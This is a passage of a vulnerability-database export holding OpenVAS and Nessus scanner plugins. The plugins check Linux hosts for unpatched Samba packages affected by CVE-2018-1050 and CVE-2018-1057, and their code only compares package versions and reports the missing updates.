Vulnerability Test\n# $Id: gb_fedora_2018_7d0acd608b_samba_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-7d0acd608b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874251\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-21 15:10:41 +0100 (Wed, 21 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-7d0acd608b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d0acd608b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3W6SCHFMINJOBDMPSQTSDO2ZG2AX67PC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.6.14~0.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-15T00:00:00", "id": "OPENVAS:1361412562310874236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874236", "title": "Fedora Update for samba FEDORA-2018-c5c651ac44", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c5c651ac44_samba_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-c5c651ac44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874236\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-15 08:54:09 +0100 (Thu, 15 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-c5c651ac44\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W4YHPBMSDW7MNTSL66Q2USGUGNTJKIW5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.7.6~0.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-15T00:00:00", "id": "OPENVAS:1361412562310874235", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874235", "title": "Fedora Update for libldb FEDORA-2018-c5c651ac44", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c5c651ac44_libldb_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libldb FEDORA-2018-c5c651ac44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874235\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-15 08:54:04 +0100 (Thu, 15 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libldb FEDORA-2018-c5c651ac44\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libldb'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libldb on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TSEA6GWWGBHUTR2IVCLHKI5VCXTHRA3U\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libldb\", rpm:\"libldb~1.3.2~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310843469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843469", "title": "Ubuntu Update for samba USN-3595-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3595_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for samba USN-3595-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843469\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 08:30:51 +0100 (Wed, 14 Mar 2018)\");\n script_cve_id(\"CVE-2018-1057\", \"CVE-2018-1050\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for samba USN-3595-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bjrn Baumbach discovered that Samba\n incorrectly validated permissions when changing account passwords via LDAP. An\n authenticated attacker could use this issue to change the password of other\n users, including administrators, and perform actions as those users.\n (CVE-2018-1057) It was discovered that Samba incorrectly validated inputs to the\n RPC spoolss service. An authenticated attacker could use this issue to cause the\n service to crash, resulting in a denial of service. (CVE-2018-1050)\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3595-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3595-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.6.7+dfsg-1ubuntu3.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.6.7+dfsg-1ubuntu3.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "Multiple Vulnerabilities in Samba 4.0 onward.", "modified": "2018-10-26T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310113133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113133", "title": "Samba 4 Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_samba_mult_vuln.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Samba 4 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113133\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:45:55 +0100 (Wed, 14 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n\n script_name(\"Samba 4 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_samba_detect.nasl\");\n script_mandatory_keys(\"samba/smb_or_ssh/detected\");\n\n script_tag(name:\"summary\", value:\"Multiple Vulnerabilities in Samba 4.0 onward.\");\n script_tag(name:\"vuldetect\", value:\"The script checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"There exist two vulnerabilities:\n\n - Samba is vulnerable to a denial of service attack when the RPC spoolss service is configured to be run as\n an external daemon. Missing input sanitization checks on some of the input parameters to spoolss RPC calls\n could cause the print spooler service to crash.\n\n - On a Samba AD DC the LDAP server in Samba incorrectly validates permissions to modify passwords over LDAP\n allowing authenticated users to change any other users' passwords, including administrative users and privileged\n service accounts (eg Domain Controllers).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would result in effects ranging from Denial of Service to Privilege Escalation,\n eventually allowing an attacker to gain full control over the target system.\");\n\n script_tag(name:\"affected\", value:\"Samba 4.x.x before 4.5.16, 4.6.x before 4.6.14 and 4.7.x before 4.7.6.\");\n\n script_tag(name:\"solution\", value:\"Update to Samba version 4.5.16, 4.6.14 or 4.7.6 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:samba:samba\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\nvers = infos['version'];\nloc = infos['location'];\n\nif( version_in_range( version: vers, test_version: \"4.0.0\", test_version2: \"4.5.15\" ) ) {\n fixed_ver = \"4.5.16\";\n}\n\nif( version_in_range( version: vers, test_version: \"4.6.0\", test_version2: \"4.6.13\" ) ) {\n fixed_ver = \"4.6.14\";\n}\n\nif( version_in_range( version: vers, test_version: \"4.7.0\", test_version2: \"4.7.5\" ) ) {\n fixed_ver = \"4.7.6\";\n}\n\nif( ! isnull( fixed_ver ) ) {\n report = report_fixed_ver( installed_version: vers, fixed_version: fixed_ver, install_path: loc );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\nIt was discovered that Samba is prone to a denial of service\nattack when the RPC spoolss service is configured to be run as an\nexternal daemon.\n\nCVE-2018-1057\nBjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\nLDAP server incorrectly validates permissions to modify passwords\nover LDAP allowing authenticated users to change any other users\npasswords, including administrative users.", "modified": "2019-07-04T00:00:00", "published": "2018-03-13T00:00:00", "id": "OPENVAS:1361412562310704135", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704135", "title": "Debian Security Advisory DSA 4135-1 (samba - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4135-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704135\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_name(\"Debian Security Advisory DSA 4135-1 (samba - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-13 00:00:00 +0100 (Tue, 13 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4135.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"samba on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), CVE-2018-1050 will be addressed\nin a later update. Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2:4.5.12+dfsg-2+deb9u2.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/samba\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\nIt was discovered that Samba is prone to a denial of service\nattack when the RPC spoolss service is configured to be run as an\nexternal daemon.\n\nCVE-2018-1057\nBjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\nLDAP server incorrectly validates permissions to modify passwords\nover LDAP allowing authenticated users to change any other users\npasswords, including administrative users.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.5.12+dfsg-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:14:07", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - samba: NULL pointer indirection in printer server\n process (CVE-2018-1050)", "modified": "2019-11-02T00:00:00", "id": "SL_20180619_SAMBA_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110891", "published": "2018-07-03T00:00:00", "title": "Scientific Linux Security Update : samba on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110891);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-2619\", \"CVE-2018-1050\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - samba: NULL pointer indirection in printer server\n process (CVE-2018-1050)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1807&L=scientific-linux-errata&F=&S=&P=2074\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d6981f8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", 